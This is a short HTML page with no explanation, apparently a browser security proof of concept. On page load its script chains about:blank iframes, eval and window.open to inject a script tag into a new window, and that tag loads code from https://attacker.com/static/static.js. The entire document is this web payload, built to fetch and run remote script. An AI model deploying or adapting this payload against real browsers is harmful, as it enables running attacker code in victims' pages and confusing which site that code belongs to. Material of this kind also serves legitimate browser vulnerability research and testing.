<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGpOoxHGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGpOoxHGGGGG.onload=_=>GGGGGpOoxHGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGpOoxHGGG src=about:blank><\/iframe><script>GGGpOoxHGGG.onload=_=>GGGpOoxHGGG.contentDocument.body.innerHTML+=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;GGGpOoxHGGG.contentWindow.location.reload();<\/script>');");GGGGGpOoxHGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>